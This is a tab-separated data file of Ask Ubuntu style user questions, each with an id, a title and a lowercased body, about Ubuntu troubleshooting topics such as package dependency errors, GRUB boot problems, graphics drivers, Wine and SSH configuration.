262771	what plugin is required to hear audio on this page	i am using ubuntu 12.04 64 bit chrome version 24.0.1312.52 on following page http : //swargarohan.org/ramcharitmanas/bal-kand/ there are audios ramcharitmanas - bal kand : mukesh ramcharitmanas - bal kand : anup jalota i have flash installed and vlc etc but upon hitting the above site the audios do not play and some missing plugin kind of screen is displayed.which plugin in required here ?
262775	for fstab in ubuntu 12.10 , what does it show for the ubuntu uuid ?	i have had to change and unchange this so many times that i want to check what it should be in a new install version . my fstab is working ok , but i may not have all the correct options written in the file . if you have not modified your u 12.10 fstab file , i would appreciate it if you could give me some feedback by checking gedit /etc/fstab and copying all after your uuid for the ubuntu partition . thanks , a4skyhawk
262780	where is the applications menu	at how do i get rid of the keyring-password-prompt on one.ubuntu.com i got to read : open applications- > accessories- > passwords and encryption keys or on ubuntu 11.04 press the `` super key '' ( windows key on most keyboards ) and type `` passwords '' then click on `` passwords and encryption keys i do n't see any applications menu .
262785	could not install or delete a package 12.10	could not install or uninstall package due to previous configuration issues . i tried sudo apt-get -f install . it did n't work . tried sudo apt-get -- purge remove php5-xdebug . no change . appreciate any help . $ sudo apt-get install php5-xdebug reading package lists ... done building dependency tree reading state information ... done php5-xdebug is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 10 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up php5-xdebug ( 2.2.1-1 ) ... error : /etc/php5/mods-available/xdebug.ini does not exist dpkg : error processing php5-xdebug ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of php-codecoverage : php-codecoverage depends on php5-xdebug ; however : package php5-xdebug is not configured yet .
262796	deleted /usr/bin/env by mistake , how can i recover it ?	i am using ubuntu 12.04 x64 , i deleted my /usr/bin/env file by mistake . how could i restore this ? also i copy a file as /usr/bin/dev , i do n't know if i originally had a file called /usr/bin/dev . if so , how could i restore this as well ?
262802	sip client in ubuntu touch ?	newb here . i am interested in using ubuntu phone as a sip client . i would really like to hookup with whoever is doing the dialer ( or phone app or whatever it is called ) in ubuntu phone so that voip is a built in capability . android does this but not very well and it 's a shame that 3rd party app 's are required . i guess this is why i 'm not interested empathy . i do n't think i am capable of developing this but i want to get involved with a project if i can . can someone please direct me on this ? i 've been searching around and i do n't know where to go .
262804	what plaintext editor with math symbols integration is available ?	i am looking for a text-editor with full unicode-math support . plaintext math entered and rendered properly . i am not expecting typographical features and symbol-repositioning like latex , but at least render the symbols linearly . and of course input method for it , so i do not need to copy and paste . is there such an app available ? ( anywhere , not just repositories ) note : i do know about openoffice , libreoffice , word , tex , latex , mathml , etc ; but i want plaintext ! this webapp is the closest that i could find .
262807	ubuntu 12.10 wo n't install with usb pendrive , incorrect screen resolution	i downloaded 12.10 and used the universal usb software to create the pendrive . my computer boots up fine with the pendrive , but when it comes to the options screen for the installation , i get 5 or more screens displayed on my screen . i ca n't see the bottom of the screen to select which options i want . i 'm not sure if it 's my video card , or if ubuntu is n't recognizing my screen resolution correctly .
262808	xubuntu 1080p hd video play and cpu usage	i am looking for a light version of linux . i tried out unity desktop but it is a bit too much for my laptop so i switched to mint cinnamon . it is less heavy but i could not install my graphics card driver . so this time i am trying out xubuntu . i tried to watch a 1080p video on youtube . while i was watching , cpu usage was mostly like 90-70 % , rarely 30 % . is this too much ? i am giving up some desktop features in order to use less cpu but my cpu is used maybe more than unity desktop . actually i am fed up of trying to install nvidia drivers on mint . after installing nvidia drivers , the cinnamon de has vanished . it works fine somewhat now but i want to use all capacity of my hardware and it is very hard for me to understand the world of linux as a beginner but i love linux so much . now my questions : i have a 4 gb flash disk , can i install full xubuntu onto my flash disk ? what can i do to use less cpu on xubuntu ? thanks
262812	will there be a version of ubuntu touch for the htc sensation ?	i would like to ask if you are planning to make versions for htc sensation . it is quite popular phone and has large group of users such as sii . it is also newer than the dezire or dezire s .
262817	unable to find or create trash directory ?	i am a user of xubuntu and i have a problem with it . when i delete any files outside home they ca n't be deleted and instead of that , a message appears to me and says `` unable to find or create trash directory '' . i hope i find a solution for this problem , as i ca n't get rid of useless files . thanks .
262819	how to make a boot disk ( 700 mb cd ) ?	i have several old xp boxes that i would like to convert to linx . i have a boot/install disk for both ubuntu 8.04 and xubuntu 8.04 . i would link to make a boot/install disk on a cd ( not a dvd or flash drive ) for ubuntu 12.04.2l . how do i do this ? please provide the specific steps i would need to follow because everything i have tried to date is not working . alternatively , if this is not possible , could i install 8.04 and update to 12.04 ?
262828	what day in april will ubuntu 8.04 hardy server be scheduled for end of life	i searched on google to find the end of life date of ubuntu 8.04 server ( hardy heron ) but to only find that it is in `` april 2013 '' . my question is , will i get updates in april or it ends on the first of april ? thanks ! references : http : //en.wikipedia.org/wiki/list_of_ubuntu_releases # table_of_versions https : //wiki.ubuntu.com/releases # stable
262832	ubuntu 12.04 lts on lenovo ideapad u300s	i want to buy a lenovo ideapad u300s ultrabook . is it compatible with ubuntu 12.04 lts ? ( intel core i7-2677m , 4gb , 256gb ssd ) thanks !
262833	how do i force juju to deploy a fresh charm , not a cached one ?	is there a way with juju commands to clear the juju charm cache for a particular charm from a running bootstrap node ? i 'm writing a charm and for during development when i 've made changes to a charm but do n't commit a revision update i want to be able to iterate quicker .
262835	is there a current nvidia driver package from xorg-edgers ?	is there any current nvidia package ( like nvidia-current ) on xorg-edgers ppa for ubuntu quantal ? i cant see any , i just found nvidia-310 and nvida-313 maybe another ppa ?
262842	how to increase the disk space of ubuntu installed besides dual boot without using wubi ?	i want to increase the disk space on the partition that the ubuntu installed in . i wonder about doing this in windows or in ubuntu ? the rest free space is less than 300mb .
262843	how to change ppa to point to another distro	i 've installed ubuntu 13.04 , i want to install doublecmd ( double commander ) . i 've added the ppa , but when i update its looking at dists/raring/main . its not there , but it 's on precise . how could i do to make it look in precise directory ?
262844	how do i solve 'the following packages have unmet dependencies ' error ?	i am trying to do sudo apt-get upgrade and i am having the following issues . i am not able to install any package also . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : icedtea-6-jre-cacao : depends : openjdk-6-jre-headless ( = 6b27-1.12.1-2ubuntu0.12.04.2 ) but 6b27-1.12.3-0ubuntu1~12.04 is installed icedtea-6-jre-jamvm : depends : openjdk-6-jre-headless ( = 6b27-1.12.1-2ubuntu0.12.04.2 ) but 6b27-1.12.3-0ubuntu1~12.04 is installed icedtea-7-jre-jamvm : depends : openjdk-7-jre-headless ( = 7u13-2.3.6-0ubuntu0.12.04.1 ) but 7u15-2.3.7-0ubuntu1~12.04 is installed openjdk-6-jre-headless : depends : openjdk-6-jre-lib ( > = 6b27-1.12.3-0ubuntu1~12.04 ) but 6b27-1.12.1-2ubuntu0.12.04.2 is installed recommends : icedtea-6-jre-cacao ( = 6b27-1.12.3-0ubuntu1~12.04 ) but 6b27-1.12.1-2ubuntu0.12.04.2 is installed recommends : icedtea-6-jre-jamvm ( = 6b27-1.12.3-0ubuntu1~12.04 ) but 6b27-1.12.1-2ubuntu0.12.04.2 is installed openjdk-7-jre : depends : openjdk-7-jre-headless ( = 7u13-2.3.6-0ubuntu0.12.04.1 ) but 7u15-2.3.7-0ubuntu1~12.04 is installed openjdk-7-jre-headless : depends : openjdk-7-jre-lib ( = 7u15-2.3.7-0ubuntu1~12.04 ) but 7u13-2.3.6-0ubuntu0.12.04.1 is installed recommends : icedtea-7-jre-jamvm ( = 7u15-2.3.7-0ubuntu1~12.04 ) but 7u13-2.3.6-0ubuntu0.12.04.1 is installed e : unmet dependencies . try using -f. 'sudo apt-get -f install ' giving the following output.`no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : openjdk-7-jre-headless openjdk-6-jre-headless openjdk-6-jre-lib default-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm default-jre openjdk-6-jre openjdk-7-jre icedtea-7-jre-jamvm icedtea-netx openjdk-7-jre-lib ca-certificates-java libatk-wrapper-java libatk-wrapper-java-jni e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ` following is the content of my /etc/apt/sources.list file . > deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse > deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse > > # # n.b . software from this repository may not have been tested as > # # extensively as that contained in the main release , although it includes > # # newer versions of some applications which may provide useful features . > # # also , please note that software in backports will not receive any review > # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted > universe multiverse deb-src http : //archive.ubuntu.com/ubuntu > precise-backports main restricted universe multiverse > > deb http : //archive.ubuntu.com/ubuntu precise-security main restricted > deb-src http : //archive.ubuntu.com/ubuntu precise-security main > restricted deb http : //archive.ubuntu.com/ubuntu precise-security > universe deb-src http : //archive.ubuntu.com/ubuntu precise-security > universe deb http : //archive.ubuntu.com/ubuntu precise-security > multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security > multiverse > > # # uncomment the following two lines to add software from canonical's > # # 'partner ' repository . > # # this software is not part of ubuntu , but is offered by canonical and the > # # respective vendors as a service to ubuntu users . > # deb http : //archive.canonical.com/ubuntu precise partner > # deb-src http : //archive.canonical.com/ubuntu precise partner > > # # this software is not part of ubuntu , but is offered by third-party > # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src > http : //extras.ubuntu.com/ubuntu precise main deb > http : //orange.biolab.si/debian squeeze main deb-src > http : //orange.biolab.si/debian squeeze main
262848	apt-get error - tries to install dropbox	everytime i put 'sudo apt-get update ' into terminal it tries to install dropbox . how can i purge the terminal of anything that may be in it . something is holding up software center . ca n't use software center to install anything .
262853	installation problem , not showing partitions	when it comes into installing ubuntu i really wanted to try and not break anything . i have ubuntu 12.04.2 lts on a bootable usb and set my bios to make it the priority boot device , which worked great , so i 'm running ubuntu through the usb . then clicking the icon to install , made sure my wifi is connected to the internet and it will install updates while installing . it will add the 3rd party software . i click continue and then get a screen i was n't expecting . here http : //www.ubuntu.com/download/help/install-desktop-long-term-support at step 4 it shows clear options for installation of the partitions i 'm not getting that . i get this : i 'm trying to make the laptop a dual boot between windows 7 and ubuntu 12.04 specifications : sony vaio intel i3-2367m @ 1.4ghz 8gb ddr3 500gb hhd
262861	how to change working directory when open a file with double clicking on ubuntu desktop ?	wanted to open a file ( .pdb file : protein structure format , never mind ) by a double-click . the `` open with '' is manually directed to execute `` pymol '' ( a program that open the .pdb format ) with ubuntu tweak . however , i found that the working directory is $ home . as other files on the directory i opened the file is crucial i want to access them . i guess that the `` pymol '' is executed on $ home while the absolute path of the `` pdb file '' ( double-clicked file ) is passed as an argument . i guess this is somewhat general problem and ask a question : how can i let the system change the `` working directory '' to the `` directory where i clicked the file '' and execute an program ?
262868	how to set icons and theme from terminal ?	is there a way to set active icon theme and gtk theme from a terminal ? i would like to write a script that installs and sets everything up the way i like it on a fresh install .
262873	lubuntu does not remove all deleted items from trash	i have a computer which i installed lubuntu 12.10 on . i created a trash.desktop icon using the script found here : http : //forum.lxde.org/viewtopic.php ? f=8 & t=2018 however , i recently decided to delete a bunch of files and emptied the trash . i right-clicked and selected the empty trash bin option , which then proceeds to bring up a popup showing the deletion progress . unfortunately , the popup window eventually tells me that there were errors in deleting some files and lists them out . however , it did not specify the reason ; only that it failed at deleted specific files . these files were located on my second harddrive where i stored my files on / . the problem is now i ca n't find the location of the files which failed to delete . they 're sitting somewhere on my second harddrive taking up space , but nowhere to be found . the .trash-000 folder only has a few kb in it . so it ca n't be there . doing a df -h shows that roughly 67 % of my drive is full , but it should be more like 20 % . right-clicking properties for the second hard drive roughly confirms what the df command shows . doing du -h -- max-depth=1 does n't tell me where the missing files are . the disk size it reports for each folder excludes the file sizes for the missing files , so it lied to me about my disk space . i 've also manually gone through folders using ls -la . but i failed to find anything . so where did the missing files go ? it 's definitely on the second hard drive somewhere because it 's taking up space .
262876	run wine behind proxy	the title says it all . i am in a university which has authenticated proxy . wine is not detecting this . hence , none of the applications inside wine is getting internet connection . please help .
262880	source package : precise build dependencies policy for software centre	i was seeking for a detailed specification of what 's allowed as build dependencies for sources packages to be published in the software centre . i found ubuntu policy manual — chapter 4 - source packages ( do n't know if this link is still valid by the way ) , it 's rather precise while lacking some sort of precisions . what if a build requires a version of a compiler which is not available by default for a target platform . as an example , say a source package requires gcc 4.8 to build while ubuntu precise only provides gcc 4.6 ? what if a build requires a compiler which is not freely available ? as an example , current version of the ada compiler in ubuntu precise does not properly support the last version of the standard , or some applications which would requires some commercial prolog compiler to compile . what if a build depends on a library source package which is not made available as a separate source package ? the above link says there should be no source duplication , but if the library 's sources are not available separately , then there is no other way to do except copying the library source in the application 's source package ( providing it 's legally ok to do this way , which is always the case if the author of the library and application , is the same ) . these are the three questions i have pending in my mind and the above link does not answers , and i prefer to have explicit answers instead of raw personal guesses . have a nice day all .
262881	chromium + web proxy	i am trying to set up a web proxy for chromium on my 12.10 lubuntu box . in firefox i simply add the address of the autoconfigure script http : //ipaddress/autoconfig in the `` automatic proxy configuration '' box in preferences- > network- > settings and it works perfectly . in chromium i have tried various possible solutions , all of which have failed so far . what is the right way to do this ? the solution given below works but uses the same proxy for all web pages and requires you to use a command line argument when you run chromium . is there a way to do the equivalent of what firefox does ? that is load the autoconfigure script ( a javascript file ) telling chromium which urls should use the proxy ( see e.g . http : //en.wikipedia.org/wiki/proxy_auto-config ) ? that is i would like chromium to only use the proxy for selected pages . i would also like to be able easily to turn the proxy on and off .
262888	how to get openbox as kde 's window manager	i successfully installed openbox on my laptop running kubuntu 12.04 but when i login using the kde/openbox session , the desktop icons of kde , show me an '' open with ? '' pop up , while the kmenu is almost empty and is n't showing any application entries ( only leave , command , or favorites ) . i could n't find a way until now to establish a correct behaving of kde/openbox , so i would like to know where to find the method for configuring this .
262892	changes to sd card undone after re-mount ( e.g . deleted files re-appear )	after having a corrupted file system on my sd card due ( probably due to unsufficient power supply ) i want to make a new filesystem . ( e2fsck fails , log below . ) however , any file-related changes on the sd card are magically undone ! first example : when i mount the sd card , delete some files , the files disappear . when i unmount it and mount it again , the files are there again ! similarly when i modify a file 's content , the original content is back after re-mount . second example : when i create a new partition table with fdisk , the old partition table is back in place immediately . ( log below . ) third example : while i run dd if=/dev/zero of=/dev/mmcblk0 bs=1m , fdisk reasonably said disk /dev/mmcblk0 does n't contain a valid partition table . when dd was done , the old partition table was back again . i have not locked the sd card physically with the small switch . i do n't get any read-only errors . in fact , i do n't get any errors at all ! dmesg does n't report anything except that i 'm mounting a file system with errors . the problem also occurred running a xubuntu live cd ( 12.10 ) . unfortunately i do n't have access to other computers and/or sd card readers at the moment . is that a problem of my computer , my sd card , or am i missing something all the time ? any suggestions what i could try ? e2fsck fails : $ sudo e2fsck /dev/mmcblk0p2 e2fsck 1.42.5 ( 29-jul-2012 ) /dev/mmcblk0p2 : recovering journal superblock needs_recovery flag is clear , but journal has data . run journal anyway < y > ? yes e2fsck : unable to set superblock flags on /dev/mmcblk0p2 /dev/mmcblk0p2 : ********** warning : filesystem still has errors ********** here 's the log that shows that fdisk has no effect : $ sudo fdisk /dev/mmcblk0 command ( m for help ) : p disk /dev/mmcblk0 : 31.5 gb , 31460425728 bytes 4 heads , 16 sectors/track , 960096 cylinders , total 61446144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00017b69 device boot start end blocks id system /dev/mmcblk0p1 8192 122879 57344 c w95 fat32 ( lba ) /dev/mmcblk0p2 122880 61446143 30661632 83 linux command ( m for help ) : d partition number ( 1-4 ) : 1 command ( m for help ) : d selected partition 2 command ( m for help ) : p disk /dev/mmcblk0 : 31.5 gb , 31460425728 bytes 4 heads , 16 sectors/track , 960096 cylinders , total 61446144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00017b69 device boot start end blocks id system command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . syncing disks . $ sudo fdisk -l /dev/mmcblk0 disk /dev/mmcblk0 : 31.5 gb , 31460425728 bytes 4 heads , 16 sectors/track , 960096 cylinders , total 61446144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00017b69 device boot start end blocks id system /dev/mmcblk0p1 8192 122879 57344 c w95 fat32 ( lba ) /dev/mmcblk0p2 122880 61446143 30661632 83 linux
262896	what does successively pressing the ctrl key twice do ?	i am using ubuntu 12.10 . see this short video of what actually shows up on screen when we successively press the ctrl key twice : https : //www.youtube.com/watch ? v=ffztnnh5nis what does it do ? is it a shortcut ? acts as a hotkey ? a easter egg ? what exactly does happen ? now , once it has been activated , every single press of ctrl key triggers this action .
262899	removing system reserved to use grub2	today i was reading a lot about the boot process . i have win7 ubuntu multiboot , grub2 is the loader . my question is : is it safe to delete system reserved ( bootmgr in it ) , as i use grub2 ? i mean : does the grub2 loads win7 itself , or does it load the bootmgr which then loads win7 ?
262903	should i have wireless if i 'm testing ubuntu on my laptop via usb ?	i am no tech wiz , that 's why i 'm here . i have successfully ( or so i think ) installed ubuntu onto a usb and have booted my laptop with the disk . i have successfully gotten the prompt to try it out , or install ... i click try ; everything looks great except i ca n't connect to the internet . should i be able to ? if so , the file is corrupt ? if not then ill probably install next to my current server . any thoughts would be great , d
262904	ubuntu and windows 8 boot problems ( ssd uefi )	i hope someone can help me because i just dont know what else to do ! i have a dell xps 15z that has 1tb hdd and 128gb ssd . it came with windows 8 installed on the ssd . first thing i did was install ubuntu 12.10 on the ssd but the installer couldnt find windows 8 so for like a month my computer would just boot into ubuntu . i had no problems since , at the moment , i am not using windows ( but i would want to have it someday ) . so everything was ok until today that i run a software update on ubuntu and after the restart my computer just went into windows 8 and i now cant go back into ubuntu . any suggestions ? thanks edit : i was just able to enter ubuntu by pressing f12 at turn on and going into boot options . i could see both , windows 8 and ubuntu ( and ubuntu 's swap i think ) . may be from ubuntu i could fix this easier ? then i went and downloaded the boot repair app : boot repair check http : //paste.ubuntu.com/5577728/ and then i trusted the boot repair app and after the supposed `` fix '' it gave me this report http : //paste.ubuntu.com/5577739/ and after the restart i get this : after the restart i get messages like failed to open /efi/microsoft/boot/grubx64 failed to load grub failed to open /efi/boot/grubx64.efi failed to load grub checking media [ media ] checking media and then after a few seconds it goes into a grub menu in which only the ubuntu option works . the others fail . thanks ! hope someone can help me !
262908	replace windows mbr with ubuntu mbr ( ? )	i read that the mbr that `` comes with windows '' will not boot from logical partitions , and i read that other mbrs may read from a logical partition . here it is : `` need to make sure that the mbr code can boot a logical partition . as far as i remember , the mbr code that opensuse installs will do what you want , but the mbr code that microsoft uses will not ( it will only boot from a partition if it is one of the four primary partitions and is the only partition marked active ) . '' so that 's true , is there an ubuntu mbr to replace the current mbr so i can boot from logical partitions ?
262911	how do i route all my traffic that doesnt go through tor through a vpn ?	i have a netbook running ubuntu 12.10 32 bit acting as a wifi router based off this guide http : //nims11.wordpress.com/2012/04/27/hostapd-the-linux-way-to-create-virtual-wifi-access-point/ i would like to have it take in all data and send it through tor and vpn , if the data is tor-supported ( tcp , web traffic , etc . ) send it to tor and if the data is not tor-supported ( udp , whatever else ) send it through vpn otherwise block it . i 'm unclear how to do this . i do n't have any vpn or tor set up yet . also i do want to be able to ssh into this box at all times , right now i have ddclient updating dyndns.org to remedy this . below is my set up as it stands now.. internet < -- - > dns < -- - > cable modem < -- - > ubuntu netbook/wifi router < -- - > all other devices
262912	how can i boot ubuntu from a usb ?	i bought a compaq pc with windows 8 a few months ago and now i want to install ubuntu but still keep windows 8 . i tried webi but when my pc restarts it read error 0x000007b . i know that windows 8 has a thing about not letting you have ubuntu but i still want to have both os without actually losing all my data . how can i do this ?
262914	unblocking hardware switch wifi	on my toshiba laptop , ubuntu does seem to be able to hard blocking/unblocking the wifi card . i dual-boot with windows 7 and usually i leave wifi on . however , yesterday i disabled wifi while using windows and when i rebooted into ubuntu , i could n't unblock the wifi . i had to reboot into windows to re-enable the wifi . rfkill unblock all and rfkill block all do not work for the hardware switch . fn + f8 toggles the soft block of the wifi , whereas on windows it toggles the hardware switch . this is the result of lspci | network 04:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) is there a way to enable ubuntu to hard block/unblock the wifi card ?
262915	how do i have ubuntu download email then forward that to my mobile devices and other computers ?	i use a vary secure email service that has a really small quota ( under 100 megs ) , i 'd like to have my main ubuntu 12.10 32 bit system to download the mail , delete it off the server , notify my mobile devices . sure i could set up all my devices to the mail server but if my home system downloads it then deletes i may not get notified of said mail . anyone have a solution ? thanks in advance .
262918	can i delete windows after ubuntu using wubi ?	i installed ubuntu 12.10 using wubi , and it works great . i need storage space , and would like to stop using windows 8 , so can i delete windows and keep using ubuntu ? since i installed ubuntu using the `` windows ubuntu installer '' , they must be related to each other , i guess .
262924	black screen when installing ati drivers on netbook	i just installed lubuntu on my aspire one 725 . it has a radeon 7290 hd . i already tryied to install the drivers but after rebooting , i can only log in via terminal , there 's no graphic interface anymore . i fixed it by uninstalling fgrlx . so my question is : is there a proper way to install the ati drivers on my netbook , without getting the login black screen ? thank you in advance !
262935	conditional program launcher	the problem : i have an external hard drive and sometimes the driver crashes on startup . it does restart after some time . however my torrent client is also in my startup list and all the data is on the external hard drive . so if the driver fails it fails to find the files and starts downloading them again , eventually it gets an error and so on ... so what i want to be able to do is to set up the launcher for the torrent program so that it wo n't start if the external drive is not present . is this possible ? and how would you go about doing it ?
262937	restrict ssh access to specific ip for user	my /etc/ssh/sshd_config file has a line like : allowusers jim @ 11.22.33.456 if i want to allow jim to use another ip addresses , how do i specify it ? does it take the form of a comma separated list ? or , do add a similar line like allowusers jim @ new-ip-address ?
262938	best practices for monitoring log files	what are the best practices for monitoring log files on a single ubuntu server ( lamp ) ? are there any specific `` go-to '' files that should be watched ? i use fail2ban to monitor failed logins , but am looking for other things to keep an eye on .
262941	how do i completely remove phpmyadmin ?	i messed up my phpmyadmin , i have n't logged in , in phpmyadmin , in a while , and as a result i forgot my password , so i purged it like so : sudo apt-get purge phpmyadmin . i did get some error messages asking for my password but i forgot that , so i just pressed ignore , after that i installed phpmyadmin again like so : sudo apt-get install phpmyadmin . this time i wont be forgetting my password . but now , when i logging my phpmyadmin i get a 404 not found error page ! ? question : how do i completely remove phpmyadmin and as a result get phpmyadmin working again note : i am running ubuntu 12.10 ( amd64 )
262950	front usb ports wo n't respond , back ports do	i 'm not sure when , but my ubuntu machine stopped responding to front usb ports . any device plugged into the rear of the machine work fine , but the front do n't do anything . my phone wo n't even draw power when plugged into the front . i am using the ringtail experimental build , but they were working fine last night . the lsusb command returns bus 001 device 002 : id 040a:4066 kodak co . bus 002 device 004 : id 058f:6362 alcor micro corp . flash card reader/writer bus 005 device 002 : id 04f2:0841 chicony electronics co. , ltd bus 005 device 003 : id 093a:2510 pixart imaging , inc. optical mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub if that helps ... a lot of similar posts asked for that info , trying to save you guys asking .
262960	ca n't install dotnet	every time i do winetricks dotnet20 the install window comes up , i hit next , and then it crashes . here 's what the terminal says l @ l-aspire-5515 : ~ $ winetricks dotnet20 executing w_do_call dotnet20 executing load_dotnet20 executing w_do_call remove_mono executing load_remove_mono -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- mono does not appear to be installed . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- executing w_do_call fontfix executing load_fontfix setting windows version to win2k executing winetricks_early_wine regedit c : \windows\temp\_dotnet20\set-winver.reg current wine does not have wine bug 10467 , so not applying workaround current wine does not have wine bug 30845 , so not applying workaround current wine does not have wine bug 30845 , so not applying workaround executing wine dotnetfx.exe fixme : advapi : decryptfilea `` c : \\users\\l\\temp\\ixp000.tmp\\ '' 00000000 fixme : advapi : lsaopenpolicy ( ( null ) ,0x33f31c,0x00000001,0x33f344 ) stub fixme : advapi : lsaclose ( 0xcafe ) stub fixme : storage : create_storagefile storage share mode not implemented . err : seh : raise_exception unhandled exception code c0000005 flags 0 addr 0x451d7c -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- note : command 'wine dotnetfx.exe ' returned status 5 . aborting . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- l @ l-aspire-5515 : what should i do ?
262963	after normal software center updates unity3d and fglrx stopped working	i was using my system like every day , playing minecraft , watching youtube videos etc . as usual the software center popped up and asked me to do some updates . i installed them and after an hour i tried to open minecraft , unity crashed . i still got access to the shell and tried to reboot the system . after that , i can start unity only in 2d , and fglrx is n't working anymore . system : ubuntu 12.04 , 64bit , ati-radeon hd3850 here is the jockey.log > 2013-03-02 03:52:32,466 error : package failed to install : ( reading database ... 209211 files and directories currently installed . ) removing fglrx-amdcccle-updates ... dpkg : warning : while removing fglrx-amdcccle-updates , directory '/usr/share/ati ' not empty so not removed . selecting previously unselected package fglrx . ( reading database ... 209166 files and directories currently installed . ) unpacking fglrx ( from ... /fglrx_2 % 3a8.960-0ubuntu1.1_amd64.deb ) ... one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . dpkg : error processing /var/cache/apt/archives/fglrx_2 % 3a8.960-0ubuntu1.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 selecting previously unselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from ... /fglrx-amdcccle_2 % 3a8.960-0ubuntu1.1_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/fglrx_2 % 3a8.960-0ubuntu1.1_amd64.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 2013-03-02 03:52:32,589 debug : unbind/rebind on driver /sys/module/fglrx/drivers/pci : fglrx_pci : device 0000:01 : $ 2013-03-02 03:52:32,653 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting 2013-03-02 03:52:32,658 error : xorg : fglrx : get_alternative_by_name ( fglrx ) returned nothing 2013-03-02 03:52:32,737 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/x86_64-linux-gnu/mesa $ 2013-03-02 03:52:32,738 debug : fglrx is not the alternative in use 2013-03-02 03:52:39,594 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/x86_64-linux-gnu/mesa $ 2013-03-02 03:52:39,594 debug : fglrx is not the alternative in use 2013-03-02 03:52:39,685 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/x86_64-linux-gnu/mesa $ 2013-03-02 03:52:39,686 debug : fglrx is not the alternative in use 2013-03-02 03:52:39,789 debug : fglrx.enabled ( fglrx ) : target_alt none current_alt /usr/lib/x86_64-linux-gnu/mesa $ 2013-03-02 03:52:39,789 debug : fglrx is not the alternative in use addition information i found a solution and could repair fglrx with this walkthrough askubuntu.com/questions/55340/ ( no guarantee )
262965	grub timeout set to 0 , ca n't access grub menu anymore	i 'm using the newest version of ubuntu , and i set my grub timeout to 0 and the default to start windows . now i ca n't access grub or boot ubuntu . holding shift does not work when the timeout is set to 0 . how do i boot into ubuntu ?
262966	ca n't install or run wine	i am a pretty novice user and have just recently installed ubuntu 12.10 on my six year-old laptop as a dual boot with windows . i installed with the simple windows installer and have n't done any major adjustments to ubuntu other than to install the beta of google music uploader for ubuntu . i just recently tried to use get wine so i can run eac ( exact audio copy ) . however , whenever i run the command in the terminal to get wine 1.5 , i errors . for example , if i out in this command : `` sudo apt-get install wine '' i get this : '' reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . '' when i input this `` sudo apt-get install wine1.5 '' i get this : '' reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.25-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : fonts-droid but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . '' before this i tried the same with wine1.4 . same error messages . any ideas ? i 'm pretty new to ubuntu and the open-source world , so any help would be greatly appreciated . thanks .
